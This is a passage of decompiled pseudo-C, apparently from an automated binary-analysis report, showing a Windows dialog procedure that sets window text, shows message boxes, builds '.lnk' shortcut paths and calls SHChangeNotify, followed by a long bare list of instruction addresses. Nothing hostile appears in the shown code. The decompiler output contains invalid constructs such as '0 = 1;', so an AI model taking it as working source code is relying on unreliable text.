                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L73:
                                                                                                                                                              									__eax = __eax - 0x30;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax == 0) {
                                                                                                                                                              										L77:
                                                                                                                                                              										 *0x419edf = 0;
                                                                                                                                                              										L78:
                                                                                                                                                              										 *0x419ede = 0;
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L74:
                                                                                                                                                              									__eax = __eax - 1;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax == 0) {
                                                                                                                                                              										goto L79;
                                                                                                                                                              									}
                                                                                                                                                              									L75:
                                                                                                                                                              									__eax = __eax - 1;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax != 0) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L76:
                                                                                                                                                              									 *0x419edf = 1;
                                                                                                                                                              									goto L78;
                                                                                                                                                              								case 6:
                                                                                                                                                              									L85:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                              									if( *(__ebp + 0x10) != 4) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L86:
                                                                                                                                                              									_push(0);
                                                                                                                                                              									goto L87;
                                                                                                                                                              								case 7:
                                                                                                                                                              									goto L0;
                                                                                                                                                              								case 8:
                                                                                                                                                              									L107:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                              									if( *(__ebp + 0x10) == 3) {
                                                                                                                                                              										__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                              											__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                              										}
                                                                                                                                                              										__esi = __ebp + 0xc;
                                                                                                                                                              										 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                              									}
                                                                                                                                                              									 *0x41a817 = 1;
                                                                                                                                                              									goto L152;
                                                                                                                                                              								case 9:
                                                                                                                                                              									L112:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                              									if( *(__ebp + 0x10) != 5) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L113:
                                                                                                                                                              									_push(1);
                                                                                                                                                              									L87:
                                                                                                                                                              									__ebp - 0x1c34 = E0040BD80(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                              									goto L152;
                                                                                                                                                              								case 0xa:
                                                                                                                                                              									L114:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10) - 6;
                                                                                                                                                              									if( *(__ebp + 0x10) != 6) {
                                                                                                                                                              										goto L152;
                                                                                                                                                              									}
                                                                                                                                                              									L115:
                                                                                                                                                              									__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                              									__eax = E0040A250(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                              									__eax = __eax - 0x50;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax == 0) {
                                                                                                                                                              										 *(__ebp - 4) = 2;
                                                                                                                                                              									} else {
                                                                                                                                                              										__eax = __eax - 3;
                                                                                                                                                              										__eflags = __eax;
                                                                                                                                                              										if(__eax == 0) {
                                                                                                                                                              											 *(__ebp - 4) = 0xb;
                                                                                                                                                              										} else {
                                                                                                                                                              											__eax = __eax - 1;
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                              												 *(__ebp - 4) = 7;
                                                                                                                                                              											} else {
                                                                                                                                                              												 *(__ebp - 4) = 0x10;
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                              									 *(__ebp - 0x2034) = 0;
                                                                                                                                                              									 *(__ebp - 0x834) = 0;
                                                                                                                                                              									__eax = E0040A477(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                              									__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                              										L125:
                                                                                                                                                              										__ebp - 0xc34 = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                              										__eflags = __al;
                                                                                                                                                              										if(__al != 0) {
                                                                                                                                                              											goto L139;
                                                                                                                                                              										}
                                                                                                                                                              										L126:
                                                                                                                                                              										__edi = 0;
                                                                                                                                                              										__eflags =  *(__ebp - 0xc34);
                                                                                                                                                              										__esi = __ebp - 0xc34;
                                                                                                                                                              										if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                              											goto L139;
                                                                                                                                                              										} else {
                                                                                                                                                              											goto L127;
                                                                                                                                                              										}
                                                                                                                                                              										do {
                                                                                                                                                              											L127:
                                                                                                                                                              											__bl = __esi->i;
                                                                                                                                                              											__eflags = __bl - 0x20;
                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                              												L129:
                                                                                                                                                              												__eax = __ebp - 0xc34;
                                                                                                                                                              												__esi->i = 0;
                                                                                                                                                              												__eax = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                              												__eflags = __al;
                                                                                                                                                              												if(__al == 0) {
                                                                                                                                                              													L135:
                                                                                                                                                              													__esi->i = __bl;
                                                                                                                                                              													goto L136;
                                                                                                                                                              												}
                                                                                                                                                              												L130:
                                                                                                                                                              												__edi = __esi;
                                                                                                                                                              												__eflags = __bl - 0x2f;
                                                                                                                                                              												if(__bl != 0x2f) {
                                                                                                                                                              													do {
                                                                                                                                                              														L132:
                                                                                                                                                              														__esi =  &(__esi->i);
                                                                                                                                                              														__eflags = __esi->i - 0x20;
                                                                                                                                                              													} while (__esi->i == 0x20);
                                                                                                                                                              													_push(__esi);
                                                                                                                                                              													__eax = __ebp - 0x834;
                                                                                                                                                              													L134:
                                                                                                                                                              													_push(__eax);
                                                                                                                                                              													__eax = E0040A477();
                                                                                                                                                              													 *__edi = __bl;
                                                                                                                                                              													goto L136;
                                                                                                                                                              												}
                                                                                                                                                              												L131:
                                                                                                                                                              												_t185 =  &(__esi->i); // 0x1
                                                                                                                                                              												__eax = _t185;
                                                                                                                                                              												_push(_t185);
                                                                                                                                                              												 *(__ebp - 0x834) = __bl;
                                                                                                                                                              												__eax = __ebp - 0x833;
                                                                                                                                                              												goto L134;
                                                                                                                                                              											}
                                                                                                                                                              											L128:
                                                                                                                                                              											__eflags = __bl - 0x2f;
                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                              												goto L136;
                                                                                                                                                              											}
                                                                                                                                                              											goto L129;
                                                                                                                                                              											L136:
                                                                                                                                                              											__esi =  &(__esi->i);
                                                                                                                                                              											__eflags = __esi->i;
                                                                                                                                                              										} while (__esi->i != 0);
                                                                                                                                                              										__eflags = __edi;
                                                                                                                                                              										if(__edi != 0) {
                                                                                                                                                              											 *__edi = 0;
                                                                                                                                                              										}
                                                                                                                                                              										goto L139;
                                                                                                                                                              									} else {
                                                                                                                                                              										L123:
                                                                                                                                                              										__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                              										E0040A477(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                              										__eax = E004073AB(__ebp - 0xc33, 0x22);
                                                                                                                                                              										__eflags = __eax;
                                                                                                                                                              										if(__eax != 0) {
                                                                                                                                                              											 *__eax = 0;
                                                                                                                                                              											__ebp - 0x834 = E0040A477(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                              										}
                                                                                                                                                              										L139:
                                                                                                                                                              										__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                              										if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                              											__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                              											__eax = E00405822(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                              										}
                                                                                                                                                              										__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                              										E00405822(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                              										__eax = E0040AAC2(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                              										__ebp - 0x434 = E004076C8(__ebp - 0x434);
                                                                                                                                                              										__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                              										if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                              											__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                              											E0040A5E2(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                              											__eax = E004076C8(__ebp - 0x434);
                                                                                                                                                              										}
                                                                                                                                                              										__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                              										__eax = E0040A477(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                              										__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                              										__eax = __ebp - 0x74dc;
                                                                                                                                                              										if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                              											__eax = __ebp - 0xa4dc;
                                                                                                                                                              										}
                                                                                                                                                              										__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                              										__eax = __ebp - 0x434;
                                                                                                                                                              										__eax = E00407690(__ebp - 0x434);
                                                                                                                                                              										__eflags = __eax;
                                                                                                                                                              										if(__eax == 0) {
                                                                                                                                                              											L147:
                                                                                                                                                              											__ebp - 0x434 = E0040A5E2(__ebp - 0x434, ".lnk");
                                                                                                                                                              											goto L148;
                                                                                                                                                              										} else {
                                                                                                                                                              											L146:
                                                                                                                                                              											__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                              												L148:
                                                                                                                                                              												__ebp - 0x434 = E004058FF(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                              												 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                              												asm("sbb eax, eax");
                                                                                                                                                              												__ecx = __ebp - 0x834;
                                                                                                                                                              												 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                              												__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                              												asm("sbb eax, eax");
                                                                                                                                                              												__ecx = __ebp - 0x2034;
                                                                                                                                                              												 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                              												__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                              												asm("sbb eax, eax");
                                                                                                                                                              												__ecx = __ebp - 0x84dc;
                                                                                                                                                              												 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                              												__ebp - 0x44dc = E0040A9BD(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                              												__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                              												if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                              													__eax = __ebp - 0x34d4;
                                                                                                                                                              													SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                              												}
                                                                                                                                                              												goto L152;
                                                                                                                                                              											}
                                                                                                                                                              											goto L147;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								case 0xb:
                                                                                                                                                              									L150:
                                                                                                                                                              									__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                              									if( *(__ebp + 0x10) == 7) {
                                                                                                                                                              										 *0x419f90 = 1;
                                                                                                                                                              									}
                                                                                                                                                              									goto L152;
                                                                                                                                                              								case 0xc:
                                                                                                                                                              									L80:
                                                                                                                                                              									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                              									__eax = E0040A250(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                              									__eflags = __eax - 0x46;
                                                                                                                                                              									if(__eax == 0x46) {
                                                                                                                                                              										 *0x419edd = 1;
                                                                                                                                                              									} else {
                                                                                                                                                              										__eflags = __eax - 0x55;
                                                                                                                                                              										if(__eax == 0x55) {
                                                                                                                                                              											 *0x419edc = 1;
                                                                                                                                                              										} else {
                                                                                                                                                              											 *0x419edd = 0;
                                                                                                                                                              											 *0x419edc = 0;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									goto L152;
                                                                                                                                                              							}
                                                                                                                                                              							L2:
                                                                                                                                                              							_t232 = E0040A925(_t232,  *(_t309 - 4));
                                                                                                                                                              							 *(_t309 - 4) =  *(_t309 - 4) + 0x1000;
                                                                                                                                                              							_t9 = _t309 - 0xc;
                                                                                                                                                              							 *_t9 =  *((intOrPtr*)(_t309 - 0xc)) - 1;
                                                                                                                                                              							if( *_t9 != 0) {
                                                                                                                                                              								goto L2;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(_t309 - 4) =  *(_t309 - 4) & 0x00000000;
                                                                                                                                                              								goto L4;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						L153:
                                                                                                                                                              						return _t231;
                                                                                                                                                              					}
                                                                                                                                                              					L92:
                                                                                                                                                              					if( *0x41a816 != 0) {
                                                                                                                                                              						goto L152;
                                                                                                                                                              					}
                                                                                                                                                              					L93:
                                                                                                                                                              					__eax = __ebp - 0x1c34;
                                                                                                                                                              					 *(__ebp - 0x234) = 0;
                                                                                                                                                              					__eax = E0040A3AD(__ebp - 0x1c34, 0x2c);
                                                                                                                                                              					if(__eax != 0) {
                                                                                                                                                              						L99:
                                                                                                                                                              						if( *(__ebp - 0x234) == 0) {
                                                                                                                                                              							__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                              							E0040A477(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                              							__ebp - 0x234 = E0040A477(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                              						}
                                                                                                                                                              						__ebp - 0x1c34 = E0040ABA1(__ebp - 0x1c34);
                                                                                                                                                              						__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                              						 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                              						__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                              						if(__eax == 6) {
                                                                                                                                                              							goto L152;
                                                                                                                                                              						} else {
                                                                                                                                                              							L102:
                                                                                                                                                              							0 = 1;
                                                                                                                                                              							 *0x41a815 = 1;
                                                                                                                                                              							 *0x419f78 = 1;
                                                                                                                                                              							__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                              							goto L103;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L94:
                                                                                                                                                              					__esi = 0;
                                                                                                                                                              					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                              						goto L99;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L95;
                                                                                                                                                              					}
                                                                                                                                                              					while(1) {
                                                                                                                                                              						L95:
                                                                                                                                                              						if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						L96:
                                                                                                                                                              						__esi =  &(__esi->i);
                                                                                                                                                              						if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						L97:
                                                                                                                                                              						goto L99;
                                                                                                                                                              					}
                                                                                                                                                              					L98:
                                                                                                                                                              					__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                              					__eax = E0040A477(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                              					 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                              					goto L99;
                                                                                                                                                              					L103:
                                                                                                                                                              					if( *((intOrPtr*)(_t309 + 0x10)) == 7) {
                                                                                                                                                              						if( *0x419f8c == 0) {
                                                                                                                                                              							 *0x419f8c = 2;
                                                                                                                                                              						}
                                                                                                                                                              						 *0x419f88 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					goto L152;
                                                                                                                                                              				}
                                                                                                                                                              			}







                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5b9
                                                                                                                                                              0x0040c5bd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5c3
                                                                                                                                                              0x0040c5cf
                                                                                                                                                              0x0040c5dc
                                                                                                                                                              0x0040c5e1
                                                                                                                                                              0x0040c5e5
                                                                                                                                                              0x0040c5e7
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5f4
                                                                                                                                                              0x0040c5fa
                                                                                                                                                              0x0040c601
                                                                                                                                                              0x0040c609
                                                                                                                                                              0x0040c60b
                                                                                                                                                              0x0040c60e
                                                                                                                                                              0x0040c615
                                                                                                                                                              0x0040c61a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5ee
                                                                                                                                                              0x0040c5f1
                                                                                                                                                              0x0040c5f1
                                                                                                                                                              0x0040c61c
                                                                                                                                                              0x0040c628
                                                                                                                                                              0x0040c635
                                                                                                                                                              0x0040ca2a
                                                                                                                                                              0x0040ca2a
                                                                                                                                                              0x0040ca48
                                                                                                                                                              0x0040ca4d
                                                                                                                                                              0x0040ca52
                                                                                                                                                              0x0040bfe1
                                                                                                                                                              0x0040bff8
                                                                                                                                                              0x0040bffe
                                                                                                                                                              0x0040c001
                                                                                                                                                              0x0040c001
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c021
                                                                                                                                                              0x0040c03c
                                                                                                                                                              0x0040c043
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c045
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c045
                                                                                                                                                              0x0040c043
                                                                                                                                                              0x0040c04e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c054
                                                                                                                                                              0x0040c057
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c05e
                                                                                                                                                              0x0040c05e
                                                                                                                                                              0x0040c062
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c068
                                                                                                                                                              0x0040c074
                                                                                                                                                              0x0040c088
                                                                                                                                                              0x0040c094
                                                                                                                                                              0x0040c0a7
                                                                                                                                                              0x0040c0b2
                                                                                                                                                              0x0040c0c4
                                                                                                                                                              0x0040c0cf
                                                                                                                                                              0x0040c0d4
                                                                                                                                                              0x0040c0dd
                                                                                                                                                              0x0040c0e3
                                                                                                                                                              0x0040c0e8
                                                                                                                                                              0x0040c0ea
                                                                                                                                                              0x0040c256
                                                                                                                                                              0x0040c25c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c0f0
                                                                                                                                                              0x0040c0f0
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x0040c0fe
                                                                                                                                                              0x0040c104
                                                                                                                                                              0x0040c10b
                                                                                                                                                              0x0040c1bb
                                                                                                                                                              0x0040c1c2
                                                                                                                                                              0x0040c1c4
                                                                                                                                                              0x0040c1c7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1c9
                                                                                                                                                              0x0040c1d0
                                                                                                                                                              0x0040c1d6
                                                                                                                                                              0x0040c1d8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1da
                                                                                                                                                              0x0040c1da
                                                                                                                                                              0x0040c1dd
                                                                                                                                                              0x0040c1de
                                                                                                                                                              0x0040c1e6
                                                                                                                                                              0x0040c1f5
                                                                                                                                                              0x0040c1f7
                                                                                                                                                              0x0040c201
                                                                                                                                                              0x0040c203
                                                                                                                                                              0x0040c206
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c208
                                                                                                                                                              0x0040c216
                                                                                                                                                              0x0040c21c
                                                                                                                                                              0x0040c21e
                                                                                                                                                              0x0040c220
                                                                                                                                                              0x0040c225
                                                                                                                                                              0x0040c227
                                                                                                                                                              0x0040c234
                                                                                                                                                              0x0040c234
                                                                                                                                                              0x0040c227
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c21e
                                                                                                                                                              0x0040c206
                                                                                                                                                              0x0040c1d8
                                                                                                                                                              0x0040c111
                                                                                                                                                              0x0040c116
                                                                                                                                                              0x0040c119
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c11f
                                                                                                                                                              0x0040c12d
                                                                                                                                                              0x0040c139
                                                                                                                                                              0x0040c145
                                                                                                                                                              0x0040c14a
                                                                                                                                                              0x0040c14d
                                                                                                                                                              0x0040c150
                                                                                                                                                              0x0040c163
                                                                                                                                                              0x0040c16c
                                                                                                                                                              0x0040c171
                                                                                                                                                              0x0040c173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c179
                                                                                                                                                              0x0040c187
                                                                                                                                                              0x0040c195
                                                                                                                                                              0x0040c19a
                                                                                                                                                              0x0040c19c
                                                                                                                                                              0x0040c19d
                                                                                                                                                              0x0040c1a7
                                                                                                                                                              0x0040c1ae
                                                                                                                                                              0x0040c1b5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1b5
                                                                                                                                                              0x0040c152
                                                                                                                                                              0x0040c159
                                                                                                                                                              0x0040c15e
                                                                                                                                                              0x0040c161
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c23a
                                                                                                                                                              0x0040c23a
                                                                                                                                                              0x0040c243
                                                                                                                                                              0x0040c249
                                                                                                                                                              0x0040c24e
                                                                                                                                                              0x0040c24e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c266
                                                                                                                                                              0x0040c266
                                                                                                                                                              0x0040c26a
                                                                                                                                                              0x0040c270
                                                                                                                                                              0x0040c275
                                                                                                                                                              0x0040c277
                                                                                                                                                              0x0040c27a
                                                                                                                                                              0x0040c27c
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c289
                                                                                                                                                              0x0040c289
                                                                                                                                                              0x0040c28d
                                                                                                                                                              0x0040c297
                                                                                                                                                              0x0040c29f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c2a1
                                                                                                                                                              0x0040c2a3
                                                                                                                                                              0x0040c2b4
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2bc
                                                                                                                                                              0x0040c2c7
                                                                                                                                                              0x0040c2cc
                                                                                                                                                              0x0040c2d1
                                                                                                                                                              0x0040c2d3
                                                                                                                                                              0x0040c2d5
                                                                                                                                                              0x0040c2d5
                                                                                                                                                              0x0040c2d8
                                                                                                                                                              0x0040c2da
                                                                                                                                                              0x0040c2df
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c2f4
                                                                                                                                                              0x0040c2f4
                                                                                                                                                              0x0040c2f8
                                                                                                                                                              0x0040c308
                                                                                                                                                              0x0040c308
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c313
                                                                                                                                                              0x0040c313
                                                                                                                                                              0x0040c317
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c31d
                                                                                                                                                              0x0040c31d
                                                                                                                                                              0x0040c324
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c331
                                                                                                                                                              0x0040c337
                                                                                                                                                              0x0040c33e
                                                                                                                                                              0x0040c340
                                                                                                                                                              0x0040c340
                                                                                                                                                              0x0040c347
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c359
                                                                                                                                                              0x0040c35b
                                                                                                                                                              0x0040c408
                                                                                                                                                              0x0040c408
                                                                                                                                                              0x0040c40a
                                                                                                                                                              0x0040c36e
                                                                                                                                                              0x0040c376
                                                                                                                                                              0x0040c37b
                                                                                                                                                              0x0040c37d
                                                                                                                                                              0x0040c384
                                                                                                                                                              0x0040c389
                                                                                                                                                              0x0040c38b
                                                                                                                                                              0x0040c38d
                                                                                                                                                              0x0040c391
                                                                                                                                                              0x0040c393
                                                                                                                                                              0x0040c393
                                                                                                                                                              0x0040c391
                                                                                                                                                              0x0040c39e
                                                                                                                                                              0x0040c3aa
                                                                                                                                                              0x0040c3ba
                                                                                                                                                              0x0040c3c4
                                                                                                                                                              0x0040c3d3
                                                                                                                                                              0x0040c3d9
                                                                                                                                                              0x0040c3e1
                                                                                                                                                              0x0040c3e6
                                                                                                                                                              0x0040c3e8
                                                                                                                                                              0x0040c3fd
                                                                                                                                                              0x0040c3fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c3e8
                                                                                                                                                              0x0040c410
                                                                                                                                                              0x0040c410
                                                                                                                                                              0x0040c412
                                                                                                                                                              0x0040c41e
                                                                                                                                                              0x0040c41e
                                                                                                                                                              0x0040c430
                                                                                                                                                              0x0040c436
                                                                                                                                                              0x0040c438
                                                                                                                                                              0x0040c43e
                                                                                                                                                              0x0040c445
                                                                                                                                                              0x0040c453
                                                                                                                                                              0x0040c463
                                                                                                                                                              0x0040c463
                                                                                                                                                              0x0040c469
                                                                                                                                                              0x0040c470
                                                                                                                                                              0x0040c472
                                                                                                                                                              0x0040c479
                                                                                                                                                              0x0040c47e
                                                                                                                                                              0x0040c484
                                                                                                                                                              0x0040c485
                                                                                                                                                              0x0040c489
                                                                                                                                                              0x0040c497
                                                                                                                                                              0x0040c497
                                                                                                                                                              0x0040c489
                                                                                                                                                              0x0040c4a2
                                                                                                                                                              0x0040c4a4
                                                                                                                                                              0x0040c4b0
                                                                                                                                                              0x0040c4b2
                                                                                                                                                              0x0040c4b8
                                                                                                                                                              0x0040c4c6
                                                                                                                                                              0x0040c4c6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c4b8
                                                                                                                                                              0x0040c414
                                                                                                                                                              0x0040c414
                                                                                                                                                              0x0040c418
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c418
                                                                                                                                                              0x0040c361
                                                                                                                                                              0x0040c361
                                                                                                                                                              0x0040c365
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c36b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c4d0
                                                                                                                                                              0x0040c4d0
                                                                                                                                                              0x0040c4d1
                                                                                                                                                              0x0040c4d6
                                                                                                                                                              0x0040c4d8
                                                                                                                                                              0x0040c4db
                                                                                                                                                              0x0040c4db
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c511
                                                                                                                                                              0x0040c511
                                                                                                                                                              0x0040c518
                                                                                                                                                              0x0040c518
                                                                                                                                                              0x0040c51b
                                                                                                                                                              0x0040c548
                                                                                                                                                              0x0040c548
                                                                                                                                                              0x0040c54f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c54f
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c51d
                                                                                                                                                              0x0040c520
                                                                                                                                                              0x0040c535
                                                                                                                                                              0x0040c535
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c53c
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c522
                                                                                                                                                              0x0040c523
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c525
                                                                                                                                                              0x0040c526
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c52c
                                                                                                                                                              0x0040c52c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c59d
                                                                                                                                                              0x0040c59d
                                                                                                                                                              0x0040c5a1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c5a7
                                                                                                                                                              0x0040c5a7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c745
                                                                                                                                                              0x0040c745
